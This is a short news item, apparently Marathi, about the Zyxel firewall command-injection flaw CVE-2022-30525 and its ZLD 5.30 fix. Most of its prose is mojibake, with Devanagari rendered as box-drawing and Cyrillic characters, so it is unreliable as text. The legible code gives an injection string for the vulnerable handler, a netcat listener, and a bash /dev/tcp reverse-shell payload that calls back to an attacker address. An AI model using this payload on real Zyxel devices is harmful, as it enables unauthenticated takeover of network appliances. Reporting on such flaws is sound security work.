рдПрдЯреАрдкреА, рд╡реНрд╣реАрдкреАрдПрди рдЖрдгрд┐ рдпреВрдПрд╕рдЬреА рдлреНрд▓реЗрдХреНрд╕ рд╕рд┐рд░реАрдЬрдЪреНрдпрд╛ рдЭрд┐рдХреНрд╕реЗрд▓ рдЙрдкрдХрд░рдгрд╛рдВрдордзреНрдпреЗ рдПрдХ рдЧрдВрднреАрд░ рднреЗрджреНрдпрддрд╛ (CVE-2022-30525) рдУрд│рдЦрд▓реА рдЧреЗрд▓реА рдЖрд╣реЗ, рдЬреА рдПрдВрдЯрд░рдкреНрд░рд╛рдЗрдЬреЗрд╕рдордзреНрдпреЗ рдлрд╛рдпрд░рд╡реЙрд▓, рдЖрдпрдбреАрдПрд╕ рдЖрдгрд┐ рд╡реНрд╣реАрдкреАрдПрдирдЪреЗ рдСрдкрд░реЗрд╢рди рдЖрдпреЛрдЬрд┐рдд рдХрд░рдгреНрдпрд╛рд╕рд╛рдареА рдбрд┐рдЭрд╛рдЗрди рдХреЗрд▓реЗрд▓реА рдЖрд╣реЗ, рдЬреА рдмрд╛рд╣реНрдп рдЖрдХреНрд░рдордгрдХрд░реНрддреНрдпрд╛рд▓рд╛ рдХреЛрдб рдХрд╛рд░реНрдпрд╛рдиреНрд╡рд┐рдд рдХрд░рдгреНрдпрд╛рд╕ рдЕрдиреБрдорддреА рджреЗрддреЗ. рдкреНрд░рдорд╛рдгреАрдХрд░рдгрд╛рд╢рд┐рд╡рд╛рдп рд╡рд╛рдкрд░рдХрд░реНрддрд╛ рдЕрдзрд┐рдХрд╛рд░рд╛рдВрд╢рд┐рд╡рд╛рдп рдбрд┐рд╡реНрд╣рд╛рдЗрд╕. рд╣рд▓реНрд▓рд╛ рдХрд░рдгреНрдпрд╛рд╕рд╛рдареА, рдЖрдХреНрд░рдордгрдХрд░реНрддреНрдпрд╛рдиреЗ HTTP/HTTPS рдкреНрд░реЛрдЯреЛрдХреЙрд▓ рд╡рд╛рдкрд░реВрди рдбрд┐рд╡реНрд╣рд╛рдЗрд╕рд╡рд░ рд╡рд┐рдирдВрддреНрдпрд╛ рдкрд╛рдард╡рд┐рдгреНрдпрд╛рд╕ рд╕рдХреНрд╖рдо рдЕрд╕рдгреЗ рдЖрд╡рд╢реНрдпрдХ рдЖрд╣реЗ. Zyxel рдиреЗ ZLD 5.30 рдлрд░реНрдорд╡реЗрдЕрд░ рдЕрдкрдбреЗрдЯрдордзреАрд▓ рднреЗрджреНрдпрддрд╛ рдирд┐рд╢реНрдЪрд┐рдд рдХреЗрд▓реА рдЖрд╣реЗ. Shodan рд╕реЗрд╡реЗрдиреБрд╕рд╛рд░, рд╕рдзреНрдпрд╛ рдЬрд╛рдЧрддрд┐рдХ рдиреЗрдЯрд╡рд░реНрдХрд╡рд░ 16213 рд╕рдВрднрд╛рд╡реНрдп рдЕрд╕реБрд░рдХреНрд╖рд┐рдд рдЙрдкрдХрд░рдгреЗ рдЖрд╣реЗрдд рдЬреА HTTP/HTTPS рджреНрд╡рд╛рд░реЗ рд╡рд┐рдирдВрддреНрдпрд╛ рд╕реНрд╡реАрдХрд╛рд░рддрд╛рдд.
рд╡реЗрдм рд╣рдБрдбрд▓рд░ /ztp/cgi-bin/handler рд▓рд╛ рдЦрд╛рд╕ рдбрд┐рдЭрд╛рдЗрди рдХреЗрд▓реЗрд▓реНрдпрд╛ рдХрдорд╛рдВрдб рдкрд╛рдард╡реВрди рдСрдкрд░реЗрд╢рди рдХреЗрд▓реЗ рдЬрд╛рддреЗ, рдкреНрд░рдорд╛рдгреАрдХрд░рдгрд╛рд╢рд┐рд╡рд╛рдп рдкреНрд░рд╡реЗрд╢ рдХрд░рддрд╛ рдпреЗрддреЛ. lib_wan_settings.py рд▓рд╛рдпрдмреНрд░рд░реАрдордзреНрдпреЗ рд╡рд╛рдкрд░рд▓реЗрд▓реНрдпрд╛ os.system рдХреЙрд▓рдЪрд╛ рд╡рд╛рдкрд░ рдХрд░реВрди рдЖрдгрд┐ setWanPortSt рдСрдкрд░реЗрд╢рдирд╡рд░ рдкреНрд░рдХреНрд░рд┐рдпрд╛ рдХрд░рддрд╛рдирд╛ рдХрд╛рд░реНрдпрд╛рдиреНрд╡рд┐рдд рдХреЗрд▓реЗрд▓реНрдпрд╛ рд╕рд┐рд╕реНрдЯрдорд╡рд░ рдХрдорд╛рдВрдб рдХрд╛рд░реНрдпрд╛рдиреНрд╡рд┐рдд рдХрд░рддрд╛рдирд╛ рд╡рд┐рдирдВрддреА рдкреЕрд░рд╛рдореАрдЯрд░реНрд╕рдЪреНрдпрд╛ рдпреЛрдЧреНрдп рдХреНрд▓реАрдирдЕрдкрдЪреНрдпрд╛ рдЕрднрд╛рд╡рд╛рдореБрд│реЗ рд╕рдорд╕реНрдпрд╛ рдЙрджреНрднрд╡рддреЗ.
рдЙрджрд╛рд╣рд░рдгрд╛рд░реНрде, рдЖрдХреНрд░рдордгрдХрд░реНрддрд╛ рд╕реНрдЯреНрд░рд┐рдВрдЧ рдкрд╛рд╕ рдХрд░реВ рд╢рдХрддреЛ тАЬ; рдкрд┐рдВрдЧ 192.168.1.210;" рдЬреНрдпрд╛рдореБрд│реЗ рд╕рд┐рд╕реНрдЯреАрдорд╡рд░ "рдкрд┐рдВрдЧ 192.168.1.210" рдХрдорд╛рдВрдб рдХрд╛рд░реНрдпрд╛рдиреНрд╡рд┐рдд рд╣реЛрдИрд▓. рдХрдорд╛рдВрдб рд╢реЗрд▓рдордзреНрдпреЗ рдкреНрд░рд╡реЗрд╢ рдорд┐рд│рд╡рдгреНрдпрд╛рд╕рд╛рдареА, рддреБрдореНрд╣реА рддреБрдордЪреНрдпрд╛ рд╕рд┐рд╕реНрдЯрдорд╡рд░ тАЬnc -lvnp 1270тАЭ рдЪрд╛рд▓рд╡реВ рд╢рдХрддрд╛ рдЖрдгрд┐ рдирдВрддрд░ '; bash -c \┬╗exec bash -i &>/dev/tcp/192.168.1.210/1270 <&1;\┬╗;'.
рд╕реНрддреНрд░реЛрдд: opennet.ru